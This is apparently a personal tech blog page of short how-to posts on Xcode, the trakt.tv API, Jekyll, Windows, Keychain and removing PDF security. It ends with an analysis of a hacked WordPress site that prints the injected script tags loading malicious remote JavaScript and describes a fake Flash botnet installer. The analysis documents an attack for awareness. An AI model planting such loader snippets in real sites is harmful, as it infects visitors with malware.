How to develop iOS 10.3.x apps in Xcode 8.2.x

Published 2017-07-10, 18:44

If you work on an older version of Mac OS, for example because Apple decided your Macbook is to old to upgrade to a recent version, you might be stuck with Xcode 8.2.x to develop and test your iOS apps. Unfortunately this can lead to this nice error message if you made the mistake to upgrade your iPhone to iOS 10.3:

Could not locate device support files
This iPhone 6s is running iOS 10.3.1 (14E304), which may not be supported by this version of Xcode.

This is because the old Xcode doesn’t get these „device support files“ via updates any more. Luckily the internet is here to rescue you.

  1. Download https://www.dropbox.com/s/i1f7q8w3vgr2ozl/10.3%20%2814E269%29.zip?dl=0 and extract it
  2. Click on „Finder“ in MAC OS
  3. Click on „Go to Folder“
  4. Paste this path:
    /Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/DeviceSupport
  5. Paste your extracted „10.3 (14E269)“ directory to that place.
  6. Quit Xcode and restart it (and maybe the whole Mac).
  7. You can now run your projects successfully on your real device again.

Adapted from source: https://gist.github.com/steipete/d9b44d8e9f341e81414e86d7ff8fb62d#gistcomment-2041802

Overview of the trakt.tv API Concepts and Endpoints

Published 2017-07-03, 17:24

trakt.tv offers a very comprehensive API with an amazing documentation. But thorough as it is – and the technical details like authentication, data formats, parameters etc. are really, really well covered – it can also feel a bit overwhelming when you jump in and want to get a first overview, or are only looking for some specific data or type of data.

As I just did exactly that, I went through the whole documentation and extracted the most relevant information. The order of this article, especially the API endpoints, follows the official API documentation. I only added some more headlines to group the endpoints in a better way:

Concepts

The API only defines some terms in „Terminology“, but there is a lot more to understand what there is and how it is all connected:

Use the checkboxes next to the terms to deactivate them in the list below. You can also set if they only should be deactivated or completely hidden.

Emojis Legend

These Emojis are used in the official documentation to indicate what functionality is offered by or needed for an endpoint.

Data Endpoints

These return the nitty-gritty of Trakt: Lots of data about shows and movies and all the things related to them:

User Endoints

If it matters which user is logged in via OAuth, these endpoints are collected here:

Master Data Endpoints

These endpoints offer mostly static data that should be retrieved once and then be cached for further use:

And that’s it! All essential API endpoints of the trakt.tv API, groupd by type and explained a bit more.

Google Spreadsheet: Output current date (statically)

Published 2017-06-30, 13:03

Imagine you have a Google Spreadsheet with a „last active“ column where you e.g. log the date when you last worked on the line item. You don’t want to have to type the date every time you change something as a) typing is cumbersome and b) you don’t even know the current date anyway.

Normally there is a default keyboard shortcut for that in Google Spreadsheets:

Insert time: Ctrl + Shift + ;

Unfortunately this doesn’t really work with a German keyboard (in Windows 10 with English OS language). In Chrome you can replace the Semicolon with Ü, but in Firefox this doesn’t work and I found no way to trigger this shortcut :(

Two solutions:

  1. Create a field with formula `=TODAY()`, maybe in the second row of the headline of the table. (Unfortunately this value will be recalculated on every change – so you can’t just use THAT everywhere to get the date – this value will change.) Now you can just Ctrl + C to copy that value and then Ctrl + Shift + V to output its value (and not copy the formula) to the target cell.
  2. Add a „Date“ validation to your column. Now you can double click the cell to get a nice calendar tooltip thingie where you can just click on the date you want.

To be honest 1) doesn’t really solve b), but you can leave the formula from 1) in the subheader for that anyway and just use 2) use this instead of the value pasting from 1).

(Visual) CMS for Jekyll

Published 2017-06-22, 12:20

Jekyll is „a blog-aware, static site generator in Ruby“. It also is used by Github Pages, which means you can host simple static sites, managed via Git, for free with it. That’s great.

Not that great (for me) is that you have to manage the content in the file system and manually handle Markdown files. That’s why there are multiple visual, hosted CMS for Jekyll.

I looked at some of them:

(A more complete list is at headlessCMS.org.)

So because of the shortcomings of Siteleaf (unusable because of messing with my data), Forestry (buggy editors) and Cloudcanon (doesn’t support advanced stuff) I am actually using Prose right now.

(Of course there also several options you can self host, but as that kind of defeats the purpose to go to a Github Pages hosted static site – now I have o host the CMS myself – I skipped those. Still, some links: MeetHyde, jekyll-admin)

YouTube RSS Feeds

Published 2017-04-23, 22:47

Source: http://stackoverflow.com/a/31535120

Mac OS X: Unabhängige Scroll-Richtung für Maus und Touchpad

Published 2017-04-04, 12:28

Natural Scrolling ist toll auf Mac OS X. Allerdings nur mit dem Touchpad, nicht mit der angeschlossenen USB-Maus. Dummerweise sind die „Scroll Direction“-Einstellungen von Maus und Touchpad aneinander gekoppelt, so dass wenn die eine (de)aktiviert wird, die andere dies auch tut.

Heute aber eine Lösung gefunden: https://pilotmoon.com/scrollreverser/
Installiert, konfiguriert, Problem behoben.

Windows 10: WLAN/Netzwerk von „Öffentliches Netzwerk“ auf „Privates Netzwerk“ umstellen

Published 2017-03-30, 13:20

Mit Windows 10 hat sich (mal wieder) geändert, wie man sein WLAN/Netzwerk von „öffentlich“ auf „privat“ umstellen kann. Das ist relevant weil die Windows Firewall zwischen diesen beiden Klassen von Verbindungen unterscheidet und manche Verbindung aus Versehen falsch kategorisiert werden kann. Also muss man es ändern. Nur wo?

Die Einstellung findet sich nun in den „Einstellungen“ (bzw. „Eigenschaften“, je nach dem wo man es findet) des jeweiligen WLANs/Netzwerkes und wird dort als „Dieser PC soll gefunden werden“ bezeichnet. Ist dieser Schalter auf „Ein“, wird die Verbindung als „privat“ gehandhabt, bei „Aus“ eben als „öffentlich“.

Logisch, oder? *augenroll

Viele weitere Möglichkeiten finden sich hier: https://www.deskmodder.de/wiki/index.php?title=Netzwerk_%C3%B6ffentlich_privat_%C3%A4ndern_Windows_10

Remove security from a secured PDF file

Published 2017-03-07, 21:41

One of my banks stopped offering downloadable CSV files of the statements af account. Bastards.

Luckily they still offer the monthly statement as a PDF. Parse that (parsing PDFs always is a pain, but possible), you have a CSV.

Unfortunately the PDFs offered for download are Secured PDF files. And most PDF parsing libraries can’t or don’t want to handle secured files.

„Well, bank statements are sensitive information!“ you might say. Yes they are. So I would understand if they used a security setting that requires a password to open a file. But they don’t do that. The file is just secured so… I don’t know exactly. I can do everything but open them by my trusted library.

I could just open all the files and then print them again as PDF to have an unsecured PDF file. But as I have lots of statements, this doesn’t sound too fun.

Of course there are also many paid softwares to remove PDF passwords and security features. Most cost once to register, some even monthly. Meh.

But if you spend some more time googling, there are also FREE tools:

Weeny’s tool is really nice and super usable. Happy ‚customer‘ here :)

Keychain: How to delete one certificate whose private key is also connected to other certificates without deleting this private key

Published 2015-11-25, 14:57

When you try to delete a certain certificate, Keychain by default also deletes the private key that certificate is connected to. As you don’t want to make all your other certificates that use the same private key useless, this can be a problem.

This is how you solve this problem:

  1. Create a backup of your original keychain. You may break something, and then want to go back to where you where before
  2. Create a new keychain ‚foo‘
  3. Move the certificate you want to get rid of to this new keychain
    (This will also copy the private key of this cert and remove it from all your other certificates – which are not useless)
  4. Move only the private key back to your original keychain
    (This will of course remove it from the cert you want to delete anyway and move it back to all the certs you want to keep – that are now whole again)
  5. Check if all the certificates in your original keychain are valid again and have their private key back
  6. Delete the ‚foo‘ keychain with only the cert inside
  7. Tadaaa!

But Apple software is sooo convenient…

What happens if your WordPress is hacked – or: How botnets are created with hijacked Worpess, fake Flash downloads and node.js

Published 2015-11-23, 14:14

 

I just noticed the website of an old employer has been hacked and some JavaScript is injected into their corporate website that runs on WordPress. Ouch. Of course I notified them about it and they’re just trying to figure out what happened and how to fix it.

This taken care of, I of course started looking at what the attackers placed there:

<script>
(function() {
var gcse = document.createElement('script');
gcse.type = 'text/javascript';
gcse.async = true;
gcse.src = "http://theboatersnetwork.com/js/main1.js";
var s = document.getElementsByTagName('script')[0];
s.parentNode.insertBefore(gcse, s);
})();
</script>

and
<script>
(function() {
var gcse = document.createElement('script');
gcse.type = 'text/javascript';
gcse.async = true;
gcse.src = "http://cjccontabil.com.br/wp-content/themes/Hermes/main1.js";
var s = document.getElementsByTagName('script')[0];
s.parentNode.insertBefore(gcse, s);
})();
</script>

(Actually the second script is inserted twice – probably the same post was hacked again and the payload placed a second time – even hacker forget stuff the did before.)

So we see there are two files included to this nice corporate website:

Let’s have a look at them.

http://cjccontabil.com.br/wp-content/themes/Hermes/main1.js

(Copy of the file if it gets removed: http://pastebin.com/hyNmgD6b)

This checks if there is a ‚doRedirect‘ cookie set, if not it redirects to http://bit.do/bvSyy. This pseudo bit.ly link (note the .do domain instead of .ly) redirect to some link. It also offers statistics on http://bit.do/bvSyy-, so we know this redirect has already been used (at the time of writing) 18.000 times. And we also see all the domains that include this link. Ouch. (Now I notified some other German domains – can’t notify them all :/)

The link it redirects you to is http://w5ea5z6gf.homepage.t-online.de/js/20140427232734/ which is a faked Flash Player download site where you can download a file called http://btob.es/OLD_20100113/blogbtob/flashplayer19ax_ma_install.exe . This is of course not a Flash Player, but a ZIP that extracts itself.

In there you find some node.js binaries, a script to load node if it is missing and an index.js. If you are brave enough to execute this, it downloads an updater.js, version.txt (that only says „93“) and script.js:

updater.js is basically a pimped out version of the index.js we already have, but can basically do the same stuff. script.js is another beast with 729 lines of code. Executing this you get some output like this:

> node script.js
connecting
connected
{ type: ‚createProxy‘, id: 0 }
createProxy
{ type: ‚createProxy‘,
attachTo: { ip: ‚190.128.247.118‘, port: 53963 },
id: 1 }
createProxy
creating attached proxy: 190.128.247.118:53963
attached to 190.128.247.118:53963

So it seems this is connecting to a proxy in Paraguay and … I don’t know, because I didn’t (try to) understand what the rest of script.js actually does after that. Best guess is it connects to a proxy and gets some commands, also it creates a proxy itself on my machine that can be used by other nodes to connect to and use. Someone has this list of proxies to do whatever he wants with my machine in a node.js context – and that’s a lot of things he can do.

(Anyone wants to look at script.js a bit more and tell me what it actually does? I’m curious…)

http://theboatersnetwork.com/js/main1.js

(Copy of the file if it gets removed: http://pastebin.com/VS11VZmu)

This file is a bit more straight forward, although I absolutely don’t get why it does what it does:

  1. First it POSTs to a server to get a list of keywords
  2. Then it uses these keywords to GET a search on Google API: https://www.googleapis.com/customsearch/v1element
  3. It gets the URLs of the results and puts them in a list…
  4. … that is then POSTed back to the server while getting new keywords
  5. goto 1

It uses a proper Google API key to make these requests, so Google at least know what Google account is connected to these requests. The server it sends to is a Polish IP that is known for spam, so make of that what you will. But I honestly don’t know what the use of this activity is and how you could possible gain something from this.

(Any idea?)

Conclusion

Someone hacks WordPress websites and includes strange .js files that a) lead to fake Flash downloads that install a botnet on your PC and b) abuse your browser to get URLs from a Google search.

My former employer is still trying to figure out if this is serious and who is reponsible for fixing the modified wordpress posts… this could take some time.


Tipico Pay ist eine Einzahlungs-App für den Sportwetten-Anbieter Tipico.

18 queries. 0,215 seconds.